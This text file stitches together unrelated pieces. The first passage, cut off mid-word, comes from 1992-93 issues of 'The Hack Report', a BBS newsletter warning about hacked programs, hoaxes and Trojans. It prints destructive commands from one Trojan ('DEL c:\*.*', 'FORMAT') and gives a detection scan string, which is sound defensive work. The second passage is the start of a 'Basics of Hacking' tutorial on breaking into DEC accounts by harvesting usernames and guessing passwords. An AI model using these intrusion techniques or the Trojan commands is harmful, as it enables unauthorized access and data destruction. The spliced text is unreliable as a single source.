        ============  ========    ========= ======== ========
        *total     2    222244    26 Aug 92 01:59:24

  Kelvin says the .TXT file is just an advert for a BBS, so it is "not
  relevant!".  As I said, the author of FEBBS has never seen this file, so
  I've asked Kelvin to forward a copy of it to him.

  Andrew Owens (3:690/333.11) forwarded a report of a "Maximus BBS
| Optimiser," going under the filenames MAX-XD and MAXXD20. Scott Dudley,
  the author of Maximus, says he did not write any programs that have these
  names, but he does not know whether they are or are not legitimate third
  party utilities.  I have requested further information from Andrew on
  this topic, and would appreciate anyone else's information, if they have
  any.

  Yet another short warning comes from David Bell (1:280/315), posted in
  the FidoNet SHAREWRE echo, about a file called PCPLSTD2.  All he says is
  that it is a Trojan, and that he got his information from another
  "billboard" and is merely passing it on.  Again, please help if you know
  what is going on here.

  A message in the FidoNet ASIAN_LINK echo from Choon Hwee (1:3603/263)
  grabbed my attention the moment I saw it: in capital letters, it said,
  "DO NOT RUN this file called MODTEXT.EXE, cause it is a TROJAN!!!".  He
  goes on to say that two BBSs have been destroyed by the file.  However,
  that's about all that was reported.  I really need more to go on before I
  can classify this as a Trojan and not just a false alarm (i.e., archive
  name, what it does, etc.).  Please advise.

  Greg Mills (1:16/390) posted a question to Robert Jung in the ARJ Support
  Echo (FidoNet) about a version of ARJ called 2.33.  It was unclear as to
  whether or not Mr.  Mills had seen the file.  Mr.  Jung has repeated that
  the latest version of ARJ is v2.30 (however, there is a legitimate public
  "pre-release" version numbered 2.39d).  It is possible that the
  references Greg saw about 2.33 were typos, but you never know.  Please
  help your Hack Squad out on this one - if you see it, report it.

  =========================================================================

                           The Meier/Morlan List

  Here are this month's updates on the status of the files contained in the
  Meier/Morlan List.

| Matthew Revelle (1:2608/27) lent a hand on the file WINGIF14, which he
| found as WGIF14.  The documentation from this file includes the
| following:
|
|      "This is a beta release.  Please do not distribute
|       publicly but you can go ahead and give it to WinGIF
|       users that might need some of these new features.
|       The real release should be available soon!  Please
|       let me know about bugs as well as what you think of
|       the new features."
|
| What we seem to have here is a limited beta that has escaped into
| distribution.  However, from documentation excerpts sent to me by Michael
| Pfister (CompuServe address 100042,102), there has since been a full,
| non-beta release of WinGIF v1.4 that is being distributed under the same
| filename (WINGIF14).
|
| This is a confusing situation, to be sure.  However, it is simple to
| resolve:  just look at your documentation.  If your copy is a beta
| release, go find the new one.  Thanks to Matthew and Michael for their
| help - WINGIF14 is now off the list.

| Several reports came in on NAVM, all indicating that this was the version
| of Norton AntiVirus released in 1992 in response to the Michelangelo
| virus scare.  The reports, from Mark Murphy (1:132/119) and Jerry Murphy
| (1:157/2 (no relation, I think)), struck a note of recognition here at
| Hack Central Station:  thanks to both of you.  NAVM comes off the list as
| well.

  Lee Madajczyk (1:280/5) surmises that HARRIER could be Harrier Combat
  Simulator by Mindscape, Inc.  He says that he hasn't seen anything from
  them in quite a while, and doesn't know if the company is still in
  business.

  Here are the remaining unresolved reports from Emanuel Levy (1:266/63):

  "387DX  - sounds like a Math Co-Processor emulator - might be legit

  "Barkeep sounds like it may be a version of Tapper. If you send beer mugs
  down the screen to patrons and then have to pick up the returning mugs
  and they leave tips, then it is Tapper. Or it may be an OLD game
  published in Compute Mag. If it is the one from Compute only those who
  have the Compute issue with the game in it are allowed to have a copy.

  "Harrier is either Harrier Jiump Jet or Space Harrier from Sega wich came
  out for the Commodore 64 in 89 so I would assume it came out for IBM
  around then too.

  "Gremlins- There was an Gremlins Text Adventure and a Video Came for the
  computer. The video game was put out by Atari

  Thanks, Emanuel.

  For those who have missed it before, here is what is left of the list of
  files forwarded by Joe Morlan (1:125/28), as compiled by Wes Meier, SysOp
  of the WCBBS (1-510-937-0156) and author of the AUNTIE BBS system.  Joe
  says Wes keeps a bulletin of all rejected files uploaded to him and the
  reasons they were rejected.  Joe also says he cannot confirm or deny the
  status of any of the files on the list.

  There are some that I am not familiar with or cannot confirm.  These are
  listed below, along with the description from Wes Meier's list.

| Due to the unconfirmed nature of the files below, the filenames are not
| included in the HACK????.COL and HACK????.IDX files that are a part of
| the archive of The Hack Report.  I would appreciate any help that
| anyone can offer in verifying the status of these files.  Until I receive
| verification on them, I will not count them as either hacks or pirated
| files.  Remember - innocent until proven guilty.

  My thanks go to Joe and Wes for their help.

        Filename  Reason for Rejection
        ========  =============================================
        BARKEEP   Too old, no docs and copyrighted with no copy
                  permission.
        HARRIER   Copyrighted.  No permission to copy granted.
        SLORGAME  Copyrighted.  No docs.  No permission to copy
                  granted.
        NOVELL    Copyrighted material with no permission to
                  BBS distribute
        DRUMS     I have no idea if these are legit or not.  No
                  docs.
        GREMLINS  No documantation or permission to copy given.
        CLOUDKM   A hacked commercial program.
        MENACE    Copyrighted.  No docs.  No permission to copy
                  granted.
        AIRBALL   A hacked commercial program.
        SNOOPY    Copyrighted.  No docs.  No permission to
                  copy granted.
        SLORDAX   Copyrighted.  No docs.  No permission to
                  copy granted.
        ESCAPE    Copyrighted.  No docs.  No permission to
                  copy granted.
        BANNER    Copyrighted.  No docs.  No permission to
                  copy granted.
        387DX     Copyrighted.  No docs or permission to
                  copy granted.
        WINDRV    Copyrighted.  No permission to copy granted.

  =========================================================================

                         Clarifications and Thanks

| I have received a message from Amit K. Mathur (Internet address
| mathur@SERVER.uwindsor.ca), the author of the KILL program reported by
| Mark Stansfield (1:115/404).  If you will remember, Mark claimed that
| this will delete the user's hard drive when run.
|
| According to Amit, this is possible if the program was accidentally told
| to delete the hard drive, since the program is a recursive directory
| deletion tool (with "tons of options" and plenty of progress/warning
| messages, according to Amit).  If you run it from your root directory
| with the proper commands, you could very well wind up with a clean hard
| drive.
|
| So, this reporter's advice is to go ahead and use without fear, but use
| with care.  Thanks for the help, Amit!

| Finally, and coming from an angle I never expected, Rick Moen (CompuServe
| address 76711,243) points out quite rightly that your Hack Squad has been
| a bit biased toward the American version of the English language.
| Specifically, he said that my "Maximus BBS Optimiser (sic)" comment was
| not correct, especially since the report came from Australia.  Seems that
| the folks from Oz and most of the rest of the world tend to use an S
| instead of a Z to spell the word OPTIMIZER.
|
| For those who aren't familiar with it, "sic" is used at times by a writer
| to point out that the spelling of the previous word might be incorrect,
| but it's a direct copy of the original author's spelling.  So, thanks to
| Rick's sharp eyes, I have removed the "(sic)" comment from that portion
| of the report.  (FYI, Rick, I _do_ use the correct spelling for words
| like "catalogue" and "theatre". <grin>)

  =========================================================================

                                  Help!!!

  Would the person who sent the copy of Vegas Casino 2 (filename VEGAS2) to
  The Hack Squad for testing/verification please re-identify themselves via
  NetMail?  Somehow, your message went to the great Bit Bucket in the sky.
  Thanks in advance!

  *************************************************************************

                                Conclusion

  If you see one of these on a board near you, it would be a very friendly
  gesture to let the SysOp know.  Remember, they can get in just as much
  trouble as the fiend who uploads pirated files, so help them out if you
  can.

                          ***HACK SQUAD POLICY***

  The intent of this report is to help SysOps and Users to identify
  fraudulent files.  To this extent, I give credit to the reporter of a
  confirmed hack.  On this same note, I do _not_ intend to "go after" any
  BBS SysOps who have these programs posted for d/l.  The Shareware World
  operates best when everyone works together, so it would be
  counter-productive to "rat" on anyone who has such a file on their board.
  Like I said, my intent is to help, not harm.  SysOps are strongly
  encouraged to read this report and remove all files listed within from
  their boards.  I can not and will not take any "enforcement action" on
  this, but you never know who else may be calling your board.  Pirated
  commercial software posted for d/l can get you into _deeply_ serious
  trouble with certain authorities.

  Updates of programs listed in this report need verification.  It is
  unfortunate that anyone who downloads a file must be paranoid about its
  legitimacy.  Call me a crusader, but I'd really like to see the day that
  this is no longer true.  Until then, if you _know_ of a new official
  version of a program listed here, please help me verify it.

  On the same token, hacks need to be verified, too.  I won't be held
  responsible for falsely accusing the real thing of being a fraud.  So,
  innocent until proven guilty, but unofficial until verified.

  Upcoming official releases will not be included or announced in this
  report.  It is this Co-Moderator's personal opinion that the hype
  surrounding a pending release leads to hacks and Trojans, which is
  exactly the opposite of what I'm trying to accomplish here.

  If you know of any other programs that are hacks, bogus, jokes, hoaxes,
  etc., please let me know.  Thanks for helping to keep shareware clean!

                   Lee Jackson, Author, The Hack Report
       Co-Moderator, FidoNet International Echo SHAREWRE (1:382/95)
                Moderator, FidoNet Echo WARNINGS (1:382/95)

The Hack Report Volume 2, Number 3 (March 7, 1993)

  =========================================================================
                                    ||
  From the files of The Hack Squad: ||  by Lee Jackson, Co-Moderator,
                                    ||  FidoNet International Echo SHAREWRE
          The Hack Report           ||  Volume 2, Number 3
          for March, 1993           ||  Report Date: March 7, 1993
                                    ||
  =========================================================================

  Welcome to the third 1993 issue of The Hack Report.  This is a series of
  reports that aim to help all users of files found on BBSs avoid
  fraudulent programs, and is presented as a free public service by the
  FidoNet International Shareware Echo and the author of the report, Lee
  Jackson (FidoNet 1:382/95).

  This month, another commercial software company contacts your Hack Squad,
  and several new Trojans rear their ugly heads.  Also, this issue
  introduces some minor formatting changes and an addition to the archive
  version:  an internal archive with the full text of file tests performed
  this year.  Thanks to everyone who has helped put this report together,
  and to those that have sent in comments and suggestions.

  NOTE TO SYSOPS: The Hack Report may be freely posted as a bulletin on
  your BBS, subject to these conditions:

             1) the latest version is used,
             2) it is posted in its entirety, and
             3) it is not altered in any way.

  NOTE TO OTHER READERS: The Hack Report (file version) may be freely
  uploaded to any BBS, subject to the above conditions, and only if you do
  not change the filename.  You may convert the archive type as you wish,
  but please leave the filename in its original HACK????.* format.  The
  Hack Report may also be cross-posted in other networks (with the
  permission of the other network) as long as it meets the above conditions
  and you give appropriate credit to the FidoNet International Shareware
  Echo (and the author <g>).

  The idea is to make this information available freely.  However, please
  don't cut out the disclaimers and other information if you use it, or
  confuse the issue by spreading the file under different names.  Thanks!

  DISCLAIMER: The listings of Official Versions are not a guarantee of the
  files' safety or fitness for use.  Someone out there might just be
  sick-minded enough to upload a Trojan with an "official" file name, so
  >scan everything you download<!!!  The author of this report will not be
  responsible for any damage to any system caused by the programs listed as
  Official Versions, or by anything using the name of an Official Version.

  *************************************************************************

                              Hacked Programs

  Here are the latest versions of some programs known to have hacked copies
  floating around.  Archive names are listed when known, along with the
  person who reported the fraud (thanks from us all!).

   Program              Hack(s)                    Latest Official Version
   =======              =======                    =======================
|  ARJ Archiver         ARJ250                     ARJ239C (* - see note)
|     Reported By:  Tommy Vielkanowitz(1:151/2305)
|                       ARJ240A
|     Reported By:  Ryan Shaw (1:152/38)

|  Blue Wave Offline    BWAVE_3                    BWAVE212
|   Mail Reader
|     Reported By: HW Scott Raymond

   BNU FOSSIL Driver    BNU202                     BNU170
      Reported By: Amauty Lambrecht (2:291/712)    (not counting betas)
                        BNU188B
      Reported By: David Nugent (3:632/348),
                    Author of BNU

|  F-Prot Virus Scanner FP-205B                    FP-207
      Reported By: Bill Lambdin (1:343/45)

   LhA Amiga Archiver   LHA148E                    LHA138E (Shareware)
      Reported By: Michael Arends (1:343/54)       LHA v1.50r (Regist.)
                        LHA151
      Reported By: Lawrence Chen (1:134/3002)

|  MusicPlay            MPLAY31                    MPLAY25B
|     Reported By: Lee Madajczyk (1:280/5)

   PKLite               PKLTE201                   PKL115
      Reported By: Wen-Chung Wu (1:102/342)

|  PKZip                PKZ301                     PKZ204G
      Reported By: Mark Dudley (1:3612/601)
                   Jon Grimes (1:104/332)

|  Shez                 SHEZ72A                    SHEZ87
                        SHEZ73
      Reported By: Bill Lambdin (1:343/45)

   Telix                Telix v3.20                TLX320-1
                         (Prior to Dec. 1992)      TLX320-2
                        Telix v3.25                TLX320-3
      Reported By: Brian C. Blad (1:114/107)       TLX320-4
                   Peter Kirn (WildNet, via
                                 Ken Whiton)
                        Telix v4.00
                        Telix v4.15
      Reported By: Barry Bryan (1:370/70)
                        Telix v4.25
      Reported By: Daniel Zuck (2:247/30, via Chris
                    Lueders (2:241/5306.1)
                        MegaTelix
      Verified By Jeff Woods, deltaComm, Inc.
        Please Note - the 3.20 release dated either December 10th
        or December 14th, 1992, is legitimate:  any earlier file
        calling itself v3.20 and carrying an Exis, Inc. trademark
        is not legitimate.  Please thoroughly check your version
        prior to sending questions to this reporter! <g>
                        Telix Pro
     Reported By: Jason Engebretson (1:114/36),
                   in the FidoNet TELIX echo

   Wolfenstein-3D       WOLF2-1                    #1WOLF14
                        WOLF2-2
      Reported By: Wen-Chung Wu (1:102/342)

|       * - Quick break with tradition:  by the time you read this,
|           ARJ239D may have been released.  Robert Jung has announced
|           that this is a bug fix to the current pre-release, ARJ239C.

  =========================================================================

                                Hoax Alert:

| This isn't a program hoax, but it concerns a company that most folks know
| of.  You might want to see this.
|
| A letter/text file/message has entered distribution, claiming that PKWare
| Inc. has filed for Chapter 11 bankruptcy.  The letter is dated Friday,
| February 26, 1993, and supposedly quotes Mark Gresbach of PKWare in the
| statement.
|
| However, in a message posted in the CompuServe PKWARE forum on March 1,
| 1993, PKWare employee Douglas Hay states that this is not true.  Douglas
| also points out that the perpetrator of the hoax misspelled the word
| Milwaukee (as 'Milwaukie'), and that one of the three phone numbers in
| the message for PKWare is wrong.  In short, ignore the letter - PKWare
| has _not_ filed bankruptcy.

  Other previously reported hoaxes:

  Filename      Claimed use/Actual activity/Reporter(s)
  ============  ==========================================================
  PKZ305        Hacked "new version" of PKZip.  However, a message in wide
                circulation claimed this was infected with a virus called
                PROTO-T.  This message is the actual hoax:  there may be
                one or more PROTO-T viruses around now, but none do what
                was claimed in the hoax message.  This hack, PKZ305, was
                not infected with any virus, nor did it contain Trojan
                code, per testing by Bill Logan (1:300/22), Jeff White
                (1:300/23), and Bill Lambdin (1:343/45).

  RAOPT         "Optimizes" your RemoteAccess BBS files and claims to be
                from Continental Software.  Actually does nothing but read
                your USERS.BBS file and report the number of users.  The
                program is _not_ from Continental Software, according to
                Andrew Milner.  Reported by Kai Sundren (2:201/150), via
                HW Mikael Winterkvist.

  SCORCHV2      Claims to be v2.0 of the game Scorched Earth:  this version
                doesn't yet exist.  Actually a renamed archive of version
                1.2.  Reported by Brian Dhatt (1:3648/2.5).

  =========================================================================

                              The Trojan Wars

  Trojan writers seem to be getting a bit trickier with their code lately -
  two of this month's reports involve "multipartite Trojans," or Trojans
  whose code is split among two or more files and reassembled by a "clean"
  program.  In honor of this, I recommend that you grab a Banana Split,
  cover your keyboard, and read on.

| Last month's issue included a report on a "fix" for PKZip v2.04c (yes, I
| mean 2.04c this time) that corrected the -$ (store disk volume) bug.  The
| bulk of the report came from Jeff White of The Pueblo Group in Tuscon,
| Arizona, and had reference to some suspicious code in the file.
|
| The biggest question brought up by the test concerned the following code:
|
|     Address:  0000d0e0-0000d110
|     Code:     x:/ x:  *.* /  Erasing contents of drive, completed.
|
| I have received a message from a user whose name I no longer have on file
| (please forgive me - NetMail me and I'll add your name to the report!)
| which states that this same text string can be seen within legitimate
| versions of PKZip (both v2.04e and the latest, v2.04g).  It can't be seen
| by using a file/hex viewer, but it can be seen if the code is debugged,
| and only after the program has un-PKLited itself.
|
| *** EDITOR'S NOTE - I need to state that this is not something that I
| encourage, since many shareware licenses state that debugging,
| disassembly, and/or reverse engineering is not allowed.  However,
| hopefully the folks at PKWare won't mind this bit of software sleuthing,
| since it is in their best interest to get to the heart of this matter.
|
| If you want to see the full text of the test results on this, see the
| file PKZIPFIX.RES in the archive FILETSTS.LZH, included in the archive
| version of The Hack Report.
|
| As always, our thanks go out to Bill and Jeff for their invaluable help.

  William Gordon (1:369/104) reports BEV105, a file that claims to be a
  "Beverly Hills 90210 Adventure Game."  This file contains 8 files, but
  two seem to be the real culprits:  DORINFO.DIR and INSTALL.COM.  The
  installation renames the DORINFO.DIR file to IDCKILL.EXE and invokes it.
  This program asks for some sort of wildcard according to William, then
  proceeds to delete everything on your drive that matches that wildcard.
  However, it doesn't stop there:  it continues on and deletes all .bat,
  .fon, .com, .zip, .sys, .ice, .ans, .arj, and .exe files.  William also
  says the file "comes with the following virii:  Bootkill and Genesis."

| A copy of this file was sent to Mr. White and Mr. Logan, who were able to
| confirm the behaviour that William reported.  For the complete results of
| their test, see the file BEV105.RES in the FILETSTS.LZH archive, included
| in the archive version of The Hack Report.

| Bill Lambdin (1:343/45) forwards a message from Terry Goodman in the U'NI
| Net virus conference concerning the file SCOMP.  This was advertised as a
| compression utility with better compression than PKZip.  The file passes
| all virus checkers unless you also check data files in addition to
| executables.  In short, the executable loads a file called SCOMP.DAT,
| which it uses to create a file called CASPER.COM, which is apparently the
| Casper virus.

| Another report from Bill concerns a file he located called TAXTIP93.
| This archive contains a file called TAXTIP93.DAT, which the executable
| file, TAXTIPS.EXE, renames to MOUSE.COM and tries to copy to your DOS and
| WINDOWS directory.  The new MOUSE.COM is infected with the ADA virus.

| Brian Chan (Internet, chanav@sfu.ca) found a file called PASSPRO, which
| was described with a very short line ("'Password,' or some other short
| word," according to Brian).  The archive contained these files:
|
|                              PASS    .PA1
|                              PASS    .PA2
|                              PASS    .PA3
|                              PASSWORD.COM
|
| Brian looked inside the .com file, which he says looks like a compiled
| batch file, and found these strings/commands:
|
|     Please Wait While Loading;
|     It may take in between 30seconds to 5 minutes
|     To unshrink nessessary files
|     Please Turn off Screen, and wait for the beep.
|     If You do not, your screen might not function
|     the way it should.
|     Turn Off Screen now, and press the space bar.
|
|     /C REN pass.pa1 pa.exe
|     pass.pa2 /C DEL c:\*.*
|     pass.pa2 /C DEL c:\dos\*.*
|     /C REN pa.exe pass.pa1
|     pass.pa3 FORMAT
|     c:
|     /C CLS
|
| As you can see, PASS.PA1 gets renamed to PA.EXE - the file, compressed
| with PKLite, is actually Microsoft's MS-DOS ATTRIB.EXE program.  PASS.PA2
| contains the single letter 'Y', and PASS.PA3 contains the single word
| 'Yes'.  From the looks of things, this turns out to be a multipartite
| Trojan that attempts to format (what else?) your hard drive.

| Another multipartite Trojan was spotted by James Frazee (1:343/58), under
| the filename ADD_IT.  It contains these files:
|
|                 Name of File    Size  Date
|                 ADD_IT.ARJ     40888 02-11-93
|                 =======================================
|                 ADDIT1   DAT     34283 07-20-91   2:13a
|                 ADD_IT   ANS       646 02-11-93   8:31p
|                 ADDIT2   DAT     20634 04-09-91   5:00a
|                 ADDIT    DOC       177 02-11-93   7:28p
|                 ADDIT    COM      1391 02-11-93   8:14p
|                 ADDIT3   DAT       138 02-11-93   8:13p
|                 THEDRAW  PCK       650 02-11-93   8:31p
|
| When run, ADDIT.COM merges the three .DAT files into an .EXE file.  The
| end result was that the program deleted all of the files in the directory
| in which it was run.

| Matt Hargett (1:2430/1532) found a file called DRSLEEP which he says has
| a "cheap virii (sic) in it," but actually appears to be a Trojan.  When
| the executable, DRSLEEP.EXE is run, it deletes your COMMAND.COM file.
| Not much to write home about, but nasty enough.  Thanks, Matt.

| Brent Thomas (1:202/226) says in the FidoNet DIRTY_DOZEN echo that his
| system was "taken down" by a file called DRAGON.  It claimed to be a
| Public Domain VGA and Sound Blaster supported game.  No symptoms were
| reported, except that he had to reformat his hard drive.

| Josh Burke (1:138/174) reports, via Charlie Sheridan (1:356/18), Travis
| Griggs (1:3807/8), and HW Bob Seaborn, a problem with the file PHYLOX2.
| In what might be an isolated incident, Josh says the file claimed to be a
| "really cool game, VGA gfx and SB sound."  However, the INSTALL program
| destroys hard disks.
|
| Bob Seaborn received a copy of this file and forwarded it to me - as soon
| as possible, I will try to get it tested to see just exactly what it
| does.

| John Balkunas (1:107/639) forwards information on GIFCHECK.  He reports
| that Lance Merlen (1:107/614) received an upload of this file, which,
| when checked with McAfee's ViruScan v100, reported over 5 viruses in the
| files in the archive.  No internal archive data was provided, so it is
| hard to say whether or not this is an isolated incident.

  Zack Jones (1:387/641) reports a file called GAGS which was seen in the
  San Antonio area.  The file, described as "Some Christmas practical
  jokes," was analyzed by Bill Dirks (1:385/17) and confirmed as a Trojan.
  The program grabs control of several interrupt vectors, including the
  critical error handler.  The only way to stop it once it starts is to hit
  the reset button or power down.

  When invoked, it displays a countdown from 8 to 0, which corresponds to
  drives H through A, in that order.  For each found drive, it overwrites
  the first 255 sectors with random data from a block of memory.  To add
  insult to injury, if drives B and A are empty, you are prompted to insert
  disks (so that they can be trashed as well).

  After this, the Trojan displays the message, including something like,
  "the disk was trashed but it's only a joke and they are only kidding."
  It then prompts you to reboot, which is rather hard to do unless you have
  a bootable "panic disk" floppy on hand - you certainly won't be able to
  boot from your HD.

  Bill says that if your HD is smaller than 60 megs, you're better off
  trying to recover your disk from scratch.  Between 60-120 megs, you have
  a better chance of recovery via disk utilities:  over 120 megs, you
  should be able to accomplish a complete recovery if you're careful and
  you know what you're doing.

  Bill posted the following scan string that can be used to detect this
  Trojan - if your scanner can use external strings, be sure to read the
  instructions carefully before trying to add this:

               9A46027205B003B9FF00BA0000CD26

  If your scanner requires a name for the string, Bill suggests using
  "AlamoXmasTrojan."

  This Trojan report comes from an article in MacWeek magazine, Volume 7,
  Number 2, issued January 11, 1993.  The article, posted in the FidoNet
  VIRUS_INFO echo by Robert Cummings, states that a program called CPro
  1.41.sea, claiming to be a new version of Compact Pro (a Macintosh
  shareware compression utility), will reformat any floppy in drive 1 and
  tries to reformat the user's start-up hard drive when launched.

  The file can be identified by a 312K sound resource file called "log
  jingle," which is digitized sound from the Ren and Stimpy cartoons.

  Mike Wenthold (1:271/47) found a program under the filename GS2000 which
  contained the VCL 3 [Con] Virus.  I am attempting to get further details
  on what this file is, but until then, here is the archive data that Mike
  sent:

   Length   Method    Size    CF    Date     Time    CRC      Filename
  ======== ======== ======== ==== ========= ====== ======== ============
      1984              1304  34% 22-Dec-91 01:40p 3527B16B GS2000.COM
       543               363  33% 22-Dec-91 01:58p DB83A2C0 GSUNP.DOC
  ======== ======== ======== ==== ========= ====== ======== ============
      2527              1667  34%                           2 files.

  The compression method (on this ZIP archive) was not included in his
  data.

  Frans Hagelaars (2:512/2) has posted a message in several echos
  concerning a Trojan version of the Blue Wave Offline Mail Reader that had
  been circulating in his area.  According to the warning, the "hacked"
  version attacks your hard drive boot sector and partition table, and will
  then "play tricks" with RemoteAccess userlists and phone numbers.

  The filename of this version was not given in the report, nor was it made
  clear whether the BBS door or the Reader was involved.  If you have any
  questions about the security of your copy, remember that you can always
  obtain a safe copy from the BBS of the author, George Hatchew, at FidoNet
  address 1:2240/176, phone number 1-313-743-8464, or from any of the
  official distribution sites (which I believe are listed in the
  documentation for the program).

  Filename  Claimed use/Actual activity/Reporter(s)
  ========  ==============================================================
  AANSI100  Claims to add Auto-ANSI detect to Telegard BBSs - contains
            something called the "Malhavoc Trojan," which displays a verse
            from a Toronto band and attacks files/sectors on drives C:
            through F:.  Reported by HW Todd Clayton and by George Goode
            (1:229/15).

  ANSISCR   VGA BBS ad - contains a self-extracting archive of the Yankee
            Doodle and AntiChrist viruses.  Can trash hard drives as well
            through Trojan behaviour.  Reported by Bill Dirks (1:385/17),
            and under the filename RUNME by Stephen Furness (1:163/273).

  AVENGER   Advertised as an "amazing game that supports all kind of sound
            cards...."  Contains 2 internal password-protected .ZIP format
            files, AVENGER2.DAT and AVENGER3.DAT, which are expanded by
            the program to the files RUNTIME1.COM (N1 virus) and
            RUNTIME2.COM (Anthrax virus).  From Reinhardt Mueller, via
            Bill Lambdin (1:343/45).

  BATMAN    No claim reported - searches your DOS path and tries to "delete
            the executable file that loads WildCat BBSs."  Reported by
            James Powell (Intelec PC-Security Conference), via Bill Lambdin
            (1:343/45).

  CHROME    Possible isolated incident - contains a file, FGDS.COM, which
            contains text that says "Skism Rythem Stack Virus-808."
            Reported by Richard Meyers and forwarded by Larry Dingethal
            (1:273/231).

  DBSOUND   Possible isolated incident - claimed update of the Drum
            Blaster .MOD file player.  Deletes all files in the current
            directory and all of its subdirectories.  From "Khamsin #1
            @9168*1", forwarded by HW Ken Whiton and HW Bill Dennison,
            from Ken Green of the CentraLink BBS.

  GRAFIX    Possible isolated incident - contains the file WAIT.COM, which
            is a renamed copy of DELDIR.COM, a directory remover and file
            deletion tool.  Reported by Andreas Reinicke (2:284/402).

  LOGIM613  Possible isolated incident - one internal file, MOUSE.COM,
            reports as being infected with the VCL virus when checked with
            McAfee's ViruScan v95.  Reported by Mike Wenthold (1:271/47).

  MUVBACK   Claimed keyboard utility - actual ANSI bomb that remaps the D
            key of your keyboard to invoke DEBUG and create a couple of
            Trojans from script files.  Reported by Bill Dirks.

  OPTIBBS   Aimed at RemoteAccess BBS systems - archives your USERS.BBS
            list and places it in your download directory.  Reported by
            HW Nemrod Kedem.

  QOUTES    Not a misspelling - claimed Christmas quotation generator.
            Overwrites the first 128 cylinders of your first HD, requiring
            a low level format to overcome the damage (IDE drives may need
            to go back to the factory).  Reported by Gary Marden
            (2:258/27).

  QSCAN20   Claimed small virus scanner - when run, identifies itself as
            "being a stealth bomber" and attacks your hard drive's FAT.
            Reported by Art Mason (1:229/15).

  RA111TO2  Claims to upgrade RemoteAccess 1.11 to 2.0 - acts similarly to
            the OPTIBBS file reported above.  Repor

The Basics of Hacking, by The Knights of Shadow (DECs)

******************************************************************************
			** BASICS OF HACKING I:  DECS'S **

WELCOME TO BASICS OF HACKING I:  DEC'S. IN THIS ARTICLE YOU WILL LEARN HOW TO L
OG IN TO DEC'S, LOGGING OUT, AND ALL THE FUN STUFF TO DO IN-BETWEEN.  ALL OF TH
IS INFORMATION IS BASED ON A STANDARD DEC SYSTEM.  SINCE THERE ARE DEC SYSTEM S
10 AND 20, AND WE FAVOR, THE DEC 20, THERE WILL BE MORE INFO ON THEM IN THIS
ARTICLE.  IT JUST SO HAPPENS THAT THE DEC 20 IS ALSO THE MORE COMMON OF THE T
WO, AND IS USED BY MUCH MORE INTERESTING PEOPLE (IF YOU KNOW WHAT WE MEAN...)
OK , THE FIRST THING YOU WANT TO DO WHEN YOU ARE RECEIVING CARRIER FROM A DEC
SYSTEM IS TO FIND OUT THE FORMAT OF LOGIN NAMES.  YOU CAN DO THIS BY LOOKING
AT WHO IS ON THE SYSTEM.  DEC=> @ (THE 'EXEC' LEVEL PROMPT) YOU=> SY SY IS SHO
RT FOR SY(STAT) AND SHOWS YOU THE SYSTEM STATUS.  YOU SHOULD SEE THE FORMAT OF
L OGIN NAMES...  A SYSTAT USUALLY COMES UP IN THIS FORM:  JOB LINE PROGRAM USER
JOB:  THE JOB NUMBER (NOT IMPORTANT UNLESS YOU WANT TO LOG THEM OFF LATER)
LINE:  WHAT LINE THEY ARE ON (USED TO TALK TO THEM...) THESE ARE BOTH TWO OR
THREE DIGIT NUMBERS.  PROGRAM:	WHAT PROGRAM ARE THEY RUNNING UNDER?  IF IT
SAYS 'EXEC' THEY AREN'T DOING ANYTHING AT ALL...  USER:  AHHHAHHHH!  THIS IS TH
E USER NAME THEY ARE LOGGED IN UNDER...  COPY THE FORMAT, AND HACK YOURSELF OUT
A WORKING CODE...  LOGIN FORMAT IS AS SUCH:  DEC=> @ YOU=> LOGIN USERNAME PASS
WORD USERNAME IS THE USERNAME IN THE FORMAT YOU SAW ABOVE IN THE SYSTAT.  AF
TER YOU HIT THE SPACE AFTER YOUR USERNAME, IT WILL STOP ECHOING CHARACTERS
BACK TO YOUR SCREEN.  THIS IS THE PASSWORD YOU ARE TYPING IN...  REMEMBER ,
PEOPLE USUALLY USE THEIR NAME, THEIR DOG'S NAME, THE NAME OF A FAVORITE CHAR
ACTER IN A BOOK, OR SOMETHING LIKE THIS.  A FEW CLEVER PEOPLE HAVE IT SET TO A
KEY CLUSTER (QWERTY OR ASDFG).	PW'S CAN BE FROM 1 TO 8 CHARACTERS LONG,
ANYTHING AFTER THAT IS IGNORED.  YOU ARE FINALLY IN...	IT WOULD BE NICE TO
HAVE A LITTLE HELP, WOULDN'T IT?  JUST TYPE A ?  OR THE WORD HELP, AND IT WILL
GIVE YOU A WHOLE LIST OF TOPICS...  SOME HANDY CHARACTERS FOR YOU TO KNOW
WOULD BE THE CONTROL KEYS, WOULDN'T IT?  BACKSPACE ON A DEC 20 IS RUB WHICH IS
255 ON YOUR ASCII CHART.  ON THE DEC 10 IT IS CNTRL-H.	TO ABORT A LONG
LISTING OR A PROGRAM, CNTRL-C WORKS FINE.  USE CNTRL-O TO STOP LONG OUTPUT TO
THE TERMINAL.  THIS IS HANDY WHEN PLAYING A GAME, BUT YOU DON'T WANT TO
CNTRL-C OUT.  CNTRL-T FOR THE TIME.  CNTRL-U WILL KILL THE WHOLE LINE YOU ARE
TYPING AT THE MOMENT.  YOU MAY ACCIDENTLY RUN A PROGRAM WHERE THE ONLY WAY OUT
IS A CNTRL-X, SO KEEP THAT IN RESERVE.	CNTRL-S TO STOP LISTING, CNTRL-Q TO
CONTINUE ON BOTH SYSTEMS.  IS YOUR TERMINAL HAVING TROUBLE??  LIKE, IT PAUSES
FOR NO REASON, OR IT DOESN'T BACKSPACE RIGHT?  THIS IS BECAUSE BOTH SYSTEMS
SUPPORT MANY TERMINALS, AND YOU HAVEN'T TOLD IT WHAT YOURS IS YET...  YOU ARE
USING A VT05 (ISN'T THAT FUNNY ?  I THOUGHT I HAD AN APPLE) SO YOU NEED TO TELL
IT YOU ARE ONE.  DEC=> @ YOU=> INFORMATION TERMINAL OR...  YOU=> INFO TER THIS
SHOWS YOU WHAT YOUR TERMINAL IS SET UP AS...  DEC=> ALL SORTS OF SHIT, THEN
THE @ YOU=> SET TER VT05 THIS SETS YOUR TERMINAL TYPE TO VT05.	NOW LET'S SEE
WHAT IS IN THE ACCOUNT (HERE AFTER ABBREVIATED ACCT.) THAT YOU HAVE HACKED
ONTO...  SAY => DIR SHORT FOR DIRECTORY, IT SHOWS YOU WHAT THE USER OF THE CODE
HAS SAVE TO THE DISK.  THERE SHOULD BE A FORMAT LIKE THIS:  XXXXX.OOO XXXXX IS
THE FILE NAME, FROM 1 TO 20 CHARACTE RS LONG.  OOO IS THE FILE TYPE, ONE OF:
EXE, TXT, DAT, BAS, CMD AND A FEW OTHERS THAT ARE SYSTEM DEPENDANT.  EXE IS A
